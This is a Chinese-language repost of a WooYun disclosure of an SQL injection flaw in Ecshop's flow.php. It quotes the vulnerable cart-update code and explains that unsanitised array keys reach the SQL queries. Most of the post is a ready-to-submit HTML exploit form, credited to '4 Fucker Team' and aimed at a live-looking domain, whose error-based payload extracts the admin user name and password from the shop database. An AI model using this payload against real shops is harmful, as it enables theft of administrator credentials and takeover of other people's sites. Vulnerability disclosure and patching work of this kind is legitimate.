Ecshop存在诸多SQL注射漏洞–flow.php

  • A+
所属分类:漏洞时代
摘要

from:http://www.wooyun.org/bugs/wooyun-2012-011066flow.php
[php]
elseif ($_REQUEST[‘step’] == ‘update_cart’)
{
if (isset($_POST[‘goods_number’]) && is_array($_POST[‘goods_number’]))
{
flow_update_cart($_POST[‘goods_number’]);
}
show_message($_LANG[‘update_cart_notice’], $_LANG[‘back_to_cart’], ‘flow.php’);
exit;
}
[/php]

from:http://www.wooyun.org/bugs/wooyun-2012-011066

详细说明:

flow.php
<br /> elseif ($_REQUEST['step'] == 'update_cart')<br /> {<br /> if (isset($_POST['goods_number']) && is_array($_POST['goods_number']))<br /> {<br /> flow_update_cart($_POST['goods_number']);<br /> }<br /> show_message($_LANG['update_cart_notice'], $_LANG['back_to_cart'], 'flow.php');<br /> exit;<br /> }<br />

</span></pre><br /> function flow_update_cart($arr)<br /> {<br /> /* 处理 */<br /> foreach ($arr AS $key => $val)<br /> {<br /> $val = intval(make_semiangle($val));<br /> if ($val <= 0 && !is_numeric($key))<br /> {<br /> continue;<br /> }<br /> //查询:<br /> $sql = "SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code` FROM" .$GLOBALS['ecs']->table('cart').<br /> " WHERE rec_id='$key' AND session_id='" . SESS_ID . "'";<br /> $goods = $GLOBALS['db']->getRow($sql);</p><pre></pre><p>$sql = "SELECT g.goods_name, g.goods_number ".<br /> "FROM " .$GLOBALS['ecs']->table('goods'). " AS g, ".<br /> $GLOBALS['ecs']->table('cart'). " AS c ".<br /> "WHERE g.goods_id = c.goods_id AND c.rec_id = '$key'";<br /> $row = $GLOBALS['db']->getRow($sql);<br /> //查询:系统启用了库存,检查输入的商品数量是否有效<br /> if (intval($GLOBALS['_CFG']['use_storage']) > 0 && $goods['extension_code'] != 'package_buy')<br /> {<br /> if ($row['goods_number'] < $val)<br /> {<br /> show_message(sprintf($GLOBALS['_LANG']['stock_insufficiency'], $row['goods_name'],<br /> $row['goods_number'], $row['goods_number']));<br /> exit;<br /> }<br /> /* 是货品 */<br /> $goods['product_id'] = trim($goods['product_id']);<br /> if (!empty($goods['product_id']))<br /> {
仅仅全局对数组的值有处理但是没有对key处理造成漏洞

<form name="myform" method="post" action="http://yezi.us/flow.php?step=update_cart" enctype="multipart/form-data"><br /> <input type="text" name="goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1]" value="21aaa"><br /> <input type="submit" value="Do it"><br><br /> Ecshop SQL Injection Exp [4 Fucker Team]<br /> </form>

有个坑爹吐血的事情~

原来小明同学10年已经叼了这洞了

http://www.myhack58.com/Article/html/3/62/2010/26956.htm

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: